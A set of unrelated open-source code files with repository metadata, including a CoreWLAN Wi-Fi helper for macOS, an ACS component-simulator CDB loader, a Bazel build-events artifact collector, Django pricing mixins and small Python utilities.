"name": "Python",
"bytes": "3261609"
},
{
"name": "Shell",
"bytes": "14448"
}
],
"symlink_target": ""
} |
from src.model.Sort import Sort
from src.independent.typing_imports import *
class AltUniverseConfig(NamedTuple):
name: str
sort_copies: Dict[str,Sort]
"""
For SAFE and KISS, I THINK just need to simultaneously substitute:
SApp('Dimensioned',NonnegReal,'$'), for SApp('Dimensioned',NonnegReal,'jVar')
Lighter notation...
In the following order. Substitute simultaneously even within sort op apps:
NonnegReal[$] for NonnegReal[jVar]
PosReal[Pos$] for PosReal[jVar]
Nat[Shares] for Nat[jVar]
PosInt[PosShares] for PosInt[jVar]
Then this???
Ratio(Shares,Pos$)[Shares/$] for Ratio(Nat[jVar],PosReal[jVar])
Or do we just want to *define*
Shares/$ := Ratio(Shares,Pos$) ??
"""
| {
"content_hash": "d22afd87690b4071df5b56aaa0b50881",
"timestamp": "",
"source": "github",
"line_count": 24,
"max_line_length": 79,
"avg_line_length": 28.833333333333332,
"alnum_prop": 0.7312138728323699,
"repo_name": "legalese/legalese-compiler",
"id": "2a87aebea66107d15c58f9162a2b980f9d013b61",
"size": "692",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "L4/pyL4/src/temp_src/alt_universe_config.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Common Lisp",
"bytes": "23607"
},
{
"name": "Grammatical Framework",
"bytes": "48526"
},
{
"name": "Haskell",
"bytes": "169801"
},
{
"name": "JavaScript",
"bytes": "30376"
},
{
"name": "Makefile",
"bytes": "658"
},
{
"name": "Nix",
"bytes": "25049"
},
{
"name": "Perl",
"bytes": "1775"
},
{
"name": "Prolog",
"bytes": "2845"
},
{
"name": "Python",
"bytes": "412846"
},
{
"name": "Shell",
"bytes": "348"
},
{
"name": "TeX",
"bytes": "114879"
}
],
"symlink_target": ""
} |
class UI(object):
def getInput(self, inputQuestion):
pass
def __printMenu(self,dOptionToFunction):
dKeyToOption = dict()
iCnt = 0
for sCurOption in dOptionToFunction:
dKeyToOption[str(iCnt)] = sCurOption[1]
print "%d for %s"%(iCnt, sCurOption[0])
iCnt+=1
return dKeyToOption
def menu(self, dOptionToFunction):
"""A menu that displays a set of options and maps their selection to functions.
The parameter dOptionToFunction contains tuples of the form ("value", func).
If func is not callable, then it is returned as a value. If it is callable, then
the returned value of the call is returned from the menu.
"""
dKeyToOption = self.__printMenu(dOptionToFunction)
sResp = raw_input()
while not (sResp in dKeyToOption):
print "\nWARNING: INVALID OPTION\nPlease select a valid option (From zero to %d)."%(len(dKeyToOption) - 1)
dKeyToOption = self.__printMenu(dOptionToFunction)
sResp = raw_input()
if type(dKeyToOption[sResp]).__name__ == "str":
return dKeyToOption[sResp]
else:
sRes = dKeyToOption[sResp]()
return sRes
if __name__ == "__main__":
import sys
ui = UI()
ui.menu([("Test1", lambda : sys.stdout.write("1 run!\n")),
("Test2" , lambda : sys.stdout.write("2 run!\n")),
("Exit", lambda: None)])
| {
"content_hash": "45f6532bc16b62db22c4c110a35259ad",
"timestamp": "",
"source": "github",
"line_count": 39,
"max_line_length": 112,
"avg_line_length": 34.69230769230769,
"alnum_prop": 0.6452328159645233,
"repo_name": "ggianna/Foragers",
"id": "42c5065721c24090c5b2ecc924ff102f3250e476",
"size": "1371",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ui.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "179234"
},
{
"name": "Shell",
"bytes": "3226"
}
],
"symlink_target": ""
} |
from __future__ import print_function
try: input = raw_input
except: pass
import sys
import csv
import re
#
# Read in distance matrices between raw, clean and perfect graphs for k=...
# output table: kmer,nkmers,raw_nkmers,raw_nreal,clean_nkmers,clean_nreal
#
def usage(argv,err=None):
if err is not None: print(err,file=sys.stderr)
print("usage: python",argv[0],"<dist.txt> ...",file=sys.stderr)
exit(-1)
def load_csv(csvpath):
m = []
with open(csvpath) as csvpath:
csvreader = csv.reader(csvpath, delimiter='\t', quotechar='"')
next(csvreader) # skip first row (column headers)
for row in csvreader:
m.append([ 0 if x == '.' else int(x) for x in row[1:]])
return m
def main(argv):
if len(argv) <= 1: usage(argv)
sep = ','
print("# Number of kmers in the perfect, raw and cleaned graphs")
print("# _nreal is the number of real kmers in the raw/cleaned graph")
print("# raw_errs, clean_errs are the fraction of error kmers in each graph")
print("# frac_remove_errs is the fraction of kmers removed that were seqn errs")
print(sep.join(["kmer","nkmers",
"raw_nkmers","raw_nreal",
"clean_nkmers","clean_nreal",
"raw_errs","clean_errs",
"frac_remove_errs"]))
for f in argv[1:]:
match = re.search('k([0-9]+)', f)
k = match.group(1)
m = load_csv(f)
nkmers = m[2][2]
raw_nkmers,raw_nreal = m[0][0],m[0][2]
clean_nkmers,clean_nreal = m[1][1],m[1][2]
raw_errs = (raw_nkmers-raw_nreal)/float(raw_nkmers)
clean_errs = (clean_nkmers-clean_nreal)/float(clean_nkmers)
kmers_removed = raw_nkmers-clean_nkmers
real_kmers_removed = raw_nreal-clean_nreal
frac_remove_errs = 1.0 - float(real_kmers_removed)/kmers_removed
r = [k,m[2][2],m[0][0],m[0][2],m[1][1],m[1][2],
"%.5f"%raw_errs,"%.5f"%clean_errs,"%.5f"%frac_remove_errs]
print(sep.join([str(x) for x in r]))
if __name__ == '__main__':
main(sys.argv)
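# Example invocation (illustrative; the per-k file layout is an assumption
# about how the dist.txt files are organised):
#   python make-cleaning-table.py k21/dist.txt k31/dist.txt > cleaning-table.csv
# Each input file contributes one CSV row, keyed by the k value parsed from
# its path.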
| {
"content_hash": "6d824e90a218bad0d49ef8fb917b853f",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 82,
"avg_line_length": 34.666666666666664,
"alnum_prop": 0.618421052631579,
"repo_name": "mcveanlab/mccortex",
"id": "10138a86e697ee349bdfdcd704f00f218f9d77c9",
"size": "1998",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "results/kmer_size_experiment/results/make-cleaning-table.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "1460235"
},
{
"name": "C++",
"bytes": "25521"
},
{
"name": "Makefile",
"bytes": "173795"
},
{
"name": "Objective-C",
"bytes": "2925"
},
{
"name": "Perl",
"bytes": "166361"
},
{
"name": "Python",
"bytes": "67535"
},
{
"name": "R",
"bytes": "49544"
},
{
"name": "Roff",
"bytes": "10833"
},
{
"name": "Shell",
"bytes": "44299"
},
{
"name": "TeX",
"bytes": "4051"
}
],
"symlink_target": ""
} |
'''
Contains the concrete implementation of Acssim.Servants.Representations.
BaseRepresentation.
This particular implementation provides method/attribute definitions stored
in the ACS CDB.
'''
#--REGULAR IMPORTS-------------------------------------------------------------
from operator import isSequenceType
from traceback import print_exc
#--CORBA STUBS-----------------------------------------------------------------
#--ACS Imports-----------------------------------------------------------------
from Acspy.Util.XmlObjectifier import XmlObject
from Acspy.Common.Log import getLogger
from Acssim.Corba.Utilities import listToCodeObj
from Acssim.Goodies import getComponentXMLObj
from Acssim.Goodies import getCompLocalNSList
from Acssim.Servants.Representations.BaseRepresentation import BaseRepresentation
#--GLOBALS---------------------------------------------------------------------
__revision__ = "@(#) $Id$"
#------------------------------------------------------------------------------
class CDB(BaseRepresentation):
'''
Class derived from BaseRepresentation to be used only with the CDB. In other words,
this class searches the CDB for entries describing method/attribute return
values.
'''
#--------------------------------------------------------------------------
def __init__ (self, compname, supported_interfaces):
'''
Constructor.
Parameters:
- compname is the name of the component being simulated
- supported_interfaces is an optional list of IDL interfaces which
this particular component supports.
Returns: Nothing
Raises: ???
'''
#superclass constructor
BaseRepresentation.__init__(self, compname)
#setup the logger
self.__logger = getLogger(str(CDB) + "(" + compname + ")")
#bool value showing whether the CDB entry exists or not
self.exists=0
#determine if this simulated component allows inheritance
allows_inheritence = self.handleCDB(compname)
if allows_inheritence:
#look at all supported IDL interfaces first
self.handleInterfaces(supported_interfaces)
#add this individual component one more time to override
#anything defined in the subinterfaces. this is necessary if
#the component is of type IDL:alma/x/y:1.0 and this entry
#exists in the CDB
self.handleCDB(compname)
#--------------------------------------------------------------------------
def handleCDB(self, name):
'''
Handles an individual CDB entry. This means that if parameter, "name",
exists within the ACS CDB; we take all info found within the CDB XML
and add it to this object instance overriding previous
method/attribute definitions where applicable.
Parameters: name is the name of the CDB XML within the /alma/simulated
section we are searching for.
Returns: True if the current XML allows us to look at superinterfaces.
False otherwise.
Raises: Nothing
'''
ret_val = True
#create an xml helper object
xml_obj = getComponentXMLObj(name)
# self.__logger.logInfo("xml_obj: " + xml_obj.toxml())
# work around for some odd behaviour of the CDB. If the simulated component
# node has sub nodes, then the SimulatedComponent element is replaced by the
# name of the root component
if xml_obj is not None:
try:
xml_obj.SimulatedComponent
except AttributeError:
new_el = xml_obj.createElement("SimulatedComponent")
for item in xml_obj.firstChild.attributes.items():
new_el.setAttribute(item[0], item[1])
for n in xml_obj.firstChild.childNodes:
if n.nodeType == xml_obj.ELEMENT_NODE:
new_el.appendChild(n)
xml_obj.removeChild(xml_obj.firstChild)
xml_obj.appendChild(new_el)
xml_obj = XmlObject(xml_obj.toxml())
if xml_obj!=None:
#at least one entry exists. good!
self.exists = 1
#get the corba methods
self.getCorbaMethods(xml_obj)
#get the corba attributes
self.getCorbaAttributes(xml_obj)
#setup the lifecycle methods
self.setupLifecyleMethods(xml_obj)
#allow inheritance?
ret_val = xml_obj.SimulatedComponent.getAttribute('AllowInheritance')
# self.__logger.logInfo("returning: " + str(ret_val))
return ret_val
#--------------------------------------------------------------------------
def handleInterfaces(self, supported_interfaces):
'''
Add behavior from derived interfaces for the concrete IDL interface.
Parameters: supported_interfaces is a list of IDL interface IDs.
Arrangement should matter - IDL does not support overriding
method declarations in subinterfaces. A simple list could be:
[ 'IDL:/alma/FRIDGE/FridgeControl:1.0',
'IDL:/alma/ACS/CharacteristicComponent:1.0']
Returns: Nothing
Raises: ???
'''
#convert the names in supported_interfaces to actual CDB locations
for supported_interface in supported_interfaces:
cdb_location = "interfaces/"
#Turn "IDL:alma/someModule/someInterface:1.0" into:
#"alma/someModule/someInterface/1.0/1.0"
try:
supported_interface = supported_interface.split('IDL:')[1].replace(":", "/")
except Exception, ex:
self.__logger.logWarning("Cannot parse '" + supported_interface +
"' to a CDB location!")
cdb_location = cdb_location + supported_interface
#now try to extract some useful info
self.handleCDB(cdb_location)
#--------------------------------------------------------------------------
def getCorbaMethods(self, xml_obj):
'''
Sets the CORBA methods of this object.
TODO: rename
'''
#methods is the somewhat formatted data taken from the XML. not really
#nice enough to work with yet.
try:
methods = xml_obj.SimulatedComponent._corbaMethod
if isSequenceType(methods)==0:
methods = [ methods ]
except:
return
#for each method in the list
for dom in methods:
#dictionary defining the method
temp_dict = {}
#extract the method name
methname = dom.getAttribute('Name')
#set the timeout
temp_dict['Timeout'] = float(dom.getAttribute('Timeout'))
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(methname, temp_dict)
#--------------------------------------------------------------------------
def setupLifecyleMethods(self, xml_obj):
'''
Sets the lifecycle methods of the object.
'''
try:
dom = xml_obj.SimulatedComponent.initialize
methname = "initialize"
temp_dict = {}
temp_dict['Timeout'] = 0.0
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(methname, temp_dict)
except:
pass
try:
dom = xml_obj.SimulatedComponent.cleanUp
temp_dict = {}
methname = "cleanUp"
temp_dict['Timeout'] = 0.0
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(methname, temp_dict)
except:
pass
#--------------------------------------------------------------------------
def getCorbaAttributes(self, xml_obj):
'''
Sets the CORBA attributes of this object.
TODO: rename
'''
#attributes is the somewhat formatted data taken from the XML. not really
#nice enough to work with yet.
try:
attributes = xml_obj.SimulatedComponent._corbaAttribute
if isSequenceType(attributes)==0:
attributes = [ attributes ]
except:
return
#for each method in the list
for dom in attributes:
#dictionary defining the method
temp_dict = {}
#extract the method name
attrname = dom.getAttribute('Name')
#set the timeout
temp_dict['Timeout'] = float(dom.getAttribute('Timeout'))
#get the code to be executed yielding a return value
temp_dict['Value'] = dom.getValue().rstrip().lstrip().split('\n')
temp_dict['Value'] = getCompLocalNSList(self.compname) + temp_dict['Value']
temp_dict['Value'] = listToCodeObj(temp_dict['Value'], {})
#save the dictionary
self.setMethod(attrname, temp_dict)
#--------------------------------------------------------------------------
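# Usage sketch (illustrative only): building a CDB-backed representation for a
# simulated component.  The component name below is made up and the interface
# IDs reuse the example from the handleInterfaces() docstring; running this
# requires a configured ACS/CDB environment.
if __name__ == "__main__":
    representation = CDB("FRIDGE_SIM1",
                         ["IDL:alma/FRIDGE/FridgeControl:1.0",
                          "IDL:alma/ACS/CharacteristicComponent:1.0"])
    print "CDB entry found:", bool(representation.exists)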
| {
"content_hash": "84e335913a016b4af95b5f599a0764dd",
"timestamp": "",
"source": "github",
"line_count": 257,
"max_line_length": 92,
"avg_line_length": 39.793774319066145,
"alnum_prop": 0.5341742446465239,
"repo_name": "csrg-utfsm/acscb",
"id": "b7b638c8ab37dba623441ffa272c18556a41efca",
"size": "11410",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "LGPL/CommonSoftware/acssim/src/Acssim/Servants/Representations/CDB.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "633"
},
{
"name": "Batchfile",
"bytes": "2346"
},
{
"name": "C",
"bytes": "751150"
},
{
"name": "C++",
"bytes": "7892598"
},
{
"name": "CSS",
"bytes": "21364"
},
{
"name": "Elixir",
"bytes": "906"
},
{
"name": "Emacs Lisp",
"bytes": "1990066"
},
{
"name": "FreeMarker",
"bytes": "7369"
},
{
"name": "GAP",
"bytes": "14867"
},
{
"name": "Gnuplot",
"bytes": "437"
},
{
"name": "HTML",
"bytes": "1857062"
},
{
"name": "Haskell",
"bytes": "764"
},
{
"name": "Java",
"bytes": "13573740"
},
{
"name": "JavaScript",
"bytes": "19058"
},
{
"name": "Lex",
"bytes": "5101"
},
{
"name": "Makefile",
"bytes": "1624406"
},
{
"name": "Module Management System",
"bytes": "4925"
},
{
"name": "Objective-C",
"bytes": "3223"
},
{
"name": "PLSQL",
"bytes": "9496"
},
{
"name": "Perl",
"bytes": "120411"
},
{
"name": "Python",
"bytes": "4191000"
},
{
"name": "Roff",
"bytes": "9920"
},
{
"name": "Shell",
"bytes": "1198375"
},
{
"name": "Smarty",
"bytes": "21615"
},
{
"name": "Tcl",
"bytes": "227078"
},
{
"name": "XSLT",
"bytes": "100454"
},
{
"name": "Yacc",
"bytes": "5006"
}
],
"symlink_target": ""
} |
"""Module for controlling a Wi-Fi interface using CoreWLAN.
https://developer.apple.com/library/mac/documentation/Networking/Reference/CoreWLANFrameworkRef/_index.html
"""
import logging
import os
import time
from . import cocoadialog
from . import defaults
# pylint: disable=g-import-not-at-top
try:
import objc
objc.loadBundle('CoreWLAN', globals(),
bundle_path='/System/Library/Frameworks/CoreWLAN.framework')
def R(selector, error_arg_num):
"""Register metadata for CWInterface selectors that return NSError values.
This tells the Objective-C bridge that the requested selector would normally
take a reference to an NSError as an argument and should instead return any
errors alongside the normal return values. This causes the method to return
a tuple of [Return value, Error or None].
Args:
selector: The selector as it's known in Objective-C
error_arg_num: Which numbered argument would the NSError be passed in
"""
objc.registerMetaDataForSelector(
'CWInterface', selector,
{'arguments': {error_arg_num + 1: {'type_modifier': 'o'}}})
R('scanForNetworksWithName:error:', 2)
R('setPower:error:', 2)
R('associateToNetwork:password:forceBSSID:remember:error:', 5)
del R
except ImportError:
if os.uname()[0] == 'Linux':
logging.debug('Skipping Mac imports for later mock purposes.')
else:
raise
# pylint: enable=g-import-not-at-top
GUEST_NETWORKS = defaults.GUEST_NETWORKS
GUEST_PSKS = defaults.GUEST_PSKS
def GetDefaultInterface():
"""Returns the default Wi-Fi interface."""
return CWInterface.interface() # pylint:disable=undefined-variable
def GetInterfaceName(interface=None):
"""Return the BSD name of the interface.
Args:
interface: the CWInterface to operate on.
Returns:
str: the BSD name of the interface, e.g. en0
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return None
return str(interface.interfaceName())
def GetInterfacePower(interface=None):
"""Determines if the interface is powered on.
Args:
interface: the CWInterface to operate on.
Returns:
bool: True if interface is on, False otherwise
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
return interface.power()
def SetInterfacePower(state, interface=None):
"""Sets an interfaces power state.
Args:
state: bool, True is on, False is off.
interface: the CWInterface to operate on.
Returns:
bool: whether setting the state was successful.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
if bool(interface.powerOn()) != state:
_, error = interface.setPower_error_(state, None)
if error:
logging.debug('Failed to set interface power. Error: %s', error)
return False
if state:
while interface.interfaceState() == 0:
# After powering on the interface, it takes a while before it's ready.
logging.debug('Waiting for interface to wake up')
time.sleep(5)
return True
def Disassociate(interface=None):
"""Disassociate from the current network.
Args:
interface: the CWInterface to operate on.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return
interface.disassociate()
def AssociateToNetwork(network, password=None, remember=False, interface=None):
"""Associate to a given CWNetwork.
Blocks until the association is complete.
Args:
network: the CWNetwork to connect to.
password: optional, a password to use for connecting.
remember: whether to remember the network.
interface: the CWInterface to operate on.
Returns:
bool: whether associating was successful or not.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
SetInterfacePower(True, interface=interface)
_, error = interface.associateToNetwork_password_forceBSSID_remember_error_(
network, password, False, remember, None)
if error:
logging.debug('Failed to connect. Error: %s', error)
return False
# Wait until connection is actually established
while interface.ssid() != network.ssid():
time.sleep(5)
return True
def AssociateToSSID(ssid, password=None, remember=False, interface=None):
"""Associate to a given SSID.
Blocks until the association is complete.
If the first attempt to connect fails, a second attempt will be made before
returning as CoreWLAN often mysteriously fails on the first attempt.
Args:
ssid: the SSID of the network to connect to.
password: optional, a password to use for connecting.
remember: whether to remember the network.
interface: the CWInterface to operate on.
Returns:
bool: whether associating was successful or not.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return False
SetInterfacePower(True, interface=interface)
networks = ScanForNetworks(ssid, interface=interface)
if not networks:
return False
network = networks[ssid]
return AssociateToNetwork(network, password=password,
interface=interface, remember=remember)
def ScanForNetworks(ssid, interface=None):
"""Scan for networks nearby.
Blocks until the association is complete.
The call to scanForNetworksWithName_error_ will return a list of networks
including many duplicates, so this function uses the rssiValue to pick
the CWNetwork object with the strongest signal for a given SSID. The RSSI
value goes from 0 to -100 with 0 being the best signal.
Args:
ssid: optional, an SSID to search for.
interface: the CWInterface to operate on.
Returns:
dict: CWNetwork objects keyed by the SSIDs.
"""
if not interface:
interface = GetDefaultInterface()
if not interface:
return None
SetInterfacePower(True, interface=interface)
nw = {}
networks, error = interface.scanForNetworksWithName_error_(ssid, None)
if not networks:
logging.debug('Failed to get networks. Error: %s', error)
return nw
for network in networks:
network_ssid = network.ssid()
if network_ssid not in nw:
nw[network_ssid] = network
else:
if network.rssiValue() > nw[network_ssid].rssiValue():
nw[network_ssid] = network
return nw
def _FindGuestNetwork(guest_networks, available_networks):
"""Returns the first guest network found in available networks.
Args:
guest_networks: list of string SSIDs used as guest networks.
available_networks: dict of networks to look through.
Returns:
SSID string of network found or None.
"""
for net in guest_networks:
if net in available_networks:
return net
def ConnectToNetwork(withcancelbutton):
"""Attempt to connect to a network.
If one of |GUEST_NETWORKS| is available nearby, will connect to that.
Otherwise, will offer a list of networks to connect to.
Args:
withcancelbutton: True to add a Cancel button to the Wi-Fi picker dialog.
Returns:
True if network connected, False if not or user canceled.
"""
logging.info('Searching for network to connect to, please wait')
networks = ScanForNetworks(None)
logging.info('Found these networks: %s', networks.keys())
guest_net = _FindGuestNetwork(GUEST_NETWORKS, networks)
if guest_net:
network = guest_net
else:
action = 'Refresh'
while action != 'OK':
dialog = cocoadialog.DropDown()
dialog.SetTitle('Select Wireless Network')
items = networks.keys()
items.sort()
dialog.SetItems(items)
dialog.SetButton1('OK')
dialog.SetButton2('Refresh')
if withcancelbutton:
dialog.SetButton3('Cancel')
action, network, _ = dialog.Show().split('\n')
if action == 'Refresh':
networks = ScanForNetworks(None)
elif action == 'Cancel':
return False
logging.info('Connecting to %s', network)
# Does network need a password?
password = None
if networks[network].securityMode():
if network in GUEST_NETWORKS:
for psk in GUEST_PSKS:
result = AssociateToNetwork(networks[network], password=psk)
logging.info('Attempted to connect to %s. Success: %s', network, result)
if result:
return True
logging.error('Password protected guest network detected, but known '
'passwords are not accepted.')
dialog = cocoadialog.Standard_InputBox()
dialog.SetPasswordBox()
dialog.SetTitle('Password Required')
dialog.SetInformativeText('The requested network (%s) requires a '
'password:' % network)
(_, password, _) = dialog.Show().split('\n')
result = AssociateToNetwork(networks[network], password=password)
logging.info('Attempted to connect to %s. Success: %s', network, result)
return result
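# --- Usage sketch (illustrative only) ----------------------------------------
# Scans for nearby networks on the default interface and tries to join a
# placeholder SSID; 'ExampleGuest' and 'example-psk' are made-up values, and
# this only does anything useful on a Mac where CoreWLAN loaded successfully.
def _example_usage():  # pragma: no cover
  nearby = ScanForNetworks(None)
  if nearby:
    logging.info('Visible SSIDs: %s', sorted(nearby.keys()))
  return AssociateToSSID('ExampleGuest', password='example-psk')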
| {
"content_hash": "d08b388d2a93ffeb8fbfa9476487ceeb",
"timestamp": "",
"source": "github",
"line_count": 309,
"max_line_length": 107,
"avg_line_length": 29.01294498381877,
"alnum_prop": 0.6982710540992749,
"repo_name": "netconstructor/macops",
"id": "eb834466a2e887bb8fedd48df4a3e95b45c3648e",
"size": "8965",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "gmacpyutil/gmacpyutil/airport.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "3500"
},
{
"name": "M",
"bytes": "816"
},
{
"name": "Makefile",
"bytes": "2128"
},
{
"name": "Objective-C",
"bytes": "87400"
},
{
"name": "Python",
"bytes": "400525"
},
{
"name": "Ruby",
"bytes": "2545"
},
{
"name": "Shell",
"bytes": "10252"
}
],
"symlink_target": ""
} |
from decimal import Decimal
from django.core.validators import MinValueValidator
from django.db import models
from django.utils.translation import ugettext_lazy as _
PRICE_MAX_DIGITS = 22
PRICE_DECIMAL_PLACES = 10
class UnitPriceMixin(models.Model):
"""
Mixin to expose standardized "unit_price" and "unit" field.
"""
class Meta:
abstract = True
class Units:
PER_MONTH = 'month'
PER_HALF_MONTH = 'half_month'
PER_DAY = 'day'
PER_HOUR = 'hour'
QUANTITY = 'quantity'
CHOICES = (
(PER_MONTH, _('Per month')),
(PER_HALF_MONTH, _('Per half month')),
(PER_DAY, _('Per day')),
(PER_HOUR, _('Per hour')),
(QUANTITY, _('Quantity')),
)
unit_price = models.DecimalField(
default=0,
max_digits=22,
decimal_places=7,
validators=[MinValueValidator(Decimal('0'))],
)
unit = models.CharField(default=Units.PER_DAY, max_length=30, choices=Units.CHOICES)
class ProductCodeMixin(models.Model):
class Meta:
abstract = True
# article code is used for encoding product category in accounting software
article_code = models.CharField(max_length=30, blank=True)
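# --- Usage sketch (illustrative only) -----------------------------------------
# A hypothetical offering model combining both mixins.  The class name and the
# extra ``name`` field are assumptions made for this example; ``unit_price``,
# ``unit`` and ``article_code`` come from the mixins above.
class ExamplePricedOffering(UnitPriceMixin, ProductCodeMixin):
    class Meta:
        abstract = True  # kept abstract so the example does not create a table

    name = models.CharField(max_length=150)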
| {
"content_hash": "183a06c8df05924d2dcf017d872b114e",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 88,
"avg_line_length": 25.6734693877551,
"alnum_prop": 0.609697933227345,
"repo_name": "opennode/waldur-mastermind",
"id": "7aa1a668dedfded79020ab3646ab1a8c8c2343c2",
"size": "1258",
"binary": false,
"copies": "2",
"ref": "refs/heads/develop",
"path": "src/waldur_mastermind/common/mixins.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "4429"
},
{
"name": "Dockerfile",
"bytes": "6258"
},
{
"name": "HTML",
"bytes": "42329"
},
{
"name": "JavaScript",
"bytes": "729"
},
{
"name": "Python",
"bytes": "5520019"
},
{
"name": "Shell",
"bytes": "15429"
}
],
"symlink_target": ""
} |
from django.db import models
from markitup.fields import MarkupField
class Post(models.Model):
title = models.CharField(max_length=50)
body = MarkupField('body of post')
def __unicode__(self):
return self.title
class NoRendered(models.Model):
"""
Test that the no_rendered_field keyword arg works. This arg should
never be used except by the South model-freezing.
"""
body = MarkupField(no_rendered_field=True)
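def example_usage():
    """Illustrative only (not part of the original test models): MarkupField
    stores the raw markup and a rendered version, assuming a MARKITUP_FILTER
    is configured; the title/body values here are made up."""
    post = Post.objects.create(title='Hello', body='*hello world*')
    return post.body.raw, post.body.rendered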
| {
"content_hash": "fc20f8293f2c7353c1ce3e97ee8580c7",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 70,
"avg_line_length": 25.333333333333332,
"alnum_prop": 0.6973684210526315,
"repo_name": "sedden/pkg-python-django-markitup",
"id": "7a6a8cc98cdc5159783cafc62aeeb03f6d31c406",
"size": "456",
"binary": false,
"copies": "2",
"ref": "refs/heads/ubuntu-lucid",
"path": "tests/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
"""Collecting build artifacts from a Build Events JSON file.
This script will collect test result artifacts from a provided Build Events
JSON file and copy them to a destination directory.
See https://docs.bazel.build/versions/master/build-event-protocol.html
Both source BEP file and destination dir are expected to be provided
as required --command-line-parameters.
"""
#
# Copyright 2018 Asylo authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import argparse
import json
import os
import shutil
import urllib.parse
import urllib.request
TEST_RESULTS = "Test Results"
TEST_LOG = "test.log"
TEST_XML = "test.xml"
def copy_test_results(artifacts, destination):
"""Copies Test Results to a destination.
Filenames are adjusted during the copy to match test labels.
Args:
artifacts: Collected artifacts dictionary. TEST_RESULT key will contain
test result details keyed by a test label.
Lastly, each test detail is a dictionary containing TEST_LOG and TEST_XML
keys with list of files as value.
destination: Destination dir.
Returns:
A dictionary of new paths that was produced by the copy procedure
keyed by test labels.
"""
copied = {}
if TEST_RESULTS in artifacts:
for label, test_data in artifacts[TEST_RESULTS].items():
copied[label] = []
for file_name in [TEST_LOG, TEST_XML]:
if file_name in test_data:
# Test run attempt will be set to 0 for single test run
# or to 1 when a test re-runs.
attempt = 1 if len(test_data[file_name]) > 1 else 0
for artifact_file in test_data[file_name]:
try:
new_path = test_label_to_path(destination, label,
attempt, file_name)
os.makedirs(os.path.dirname(new_path), exist_ok=True)
shutil.copyfile(artifact_file, new_path)
copied[label].append(new_path)
except IOError as err:
# If we fail to collect a particular artifact,
# we don't want to fail the buildkite workflow because the failure
# is not related to the compilation, tests, or Docker setup.
# So we will log an error and ignore/continue.
print(err)
return copied
def discover(build_events_file):
"""Discovers all build artifacts from a Build Events file.
Args:
build_events_file: Path to BEP JSON file (must exist and be readable)
Returns:
Dictionary of artifacts keyed by build stage (e.g. test)
or an empty dictionary if build_events_file does not exist.
Raises:
RuntimeError: The build_events_file isn't readable.
"""
assert build_events_file is not None
if not os.path.exists(build_events_file):
print("File {} does not exist - nothing to do!".format(build_events_file))
return {}
artifacts = {}
if not os.access(build_events_file, os.R_OK):
raise RuntimeError("File {} isn't readable!".format(build_events_file))
with open(build_events_file, "r", encoding="utf-8") as f:
bep_data = f.read()
artifacts[TEST_RESULTS] = discover_test_results(bep_data)
return artifacts
def discover_test_results(bep_data, status=None):
"""Discovers test results from a Build Events file.
Args:
bep_data: BEP data in raw form (must be previously read from the BEP file).
status: array of desired test statuses to filter.
Returns:
Test results dictionary keyed by test names.
"""
assert bep_data is not None
test_results = {}
decoder = json.JSONDecoder()
# Note that BEP data is not a JSON object but rather a stream of
# build events, each a JSON object.
# See https://git.io/JeKjQ
pos = 0
while pos < len(bep_data):
bep_obj, size = decoder.raw_decode(bep_data[pos:])
if "testSummary" in bep_obj:
test_target = bep_obj["id"]["testSummary"]["label"]
test_status = bep_obj["testSummary"]["overallStatus"]
if status is None or test_status in status:
outputs = []
for s in ["passed", "failed"]:
if s in bep_obj["testSummary"]:
outputs.extend(bep_obj["testSummary"][s])
test_logs = []
for output in outputs:
test_logs.append(urllib.request.url2pathname(
urllib.parse.urlparse(output["uri"]).path))
test_results[test_target] = {
TEST_LOG: test_logs,
TEST_XML: [t.replace(TEST_LOG, TEST_XML) for t in test_logs],
"status": test_status
}
pos += size + 1
return test_results
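# Example (illustrative only): a minimal, hand-written BEP fragment in the
# shape discover_test_results() expects -- one testSummary event per target.
# The label and file paths below are made up.
_EXAMPLE_BEP_DATA = (
    '{"id": {"testSummary": {"label": "//foo:bar_test"}},'
    ' "testSummary": {"overallStatus": "PASSED",'
    ' "passed": [{"uri": "file:///tmp/foo/bar_test/test.log"}]}}'
)
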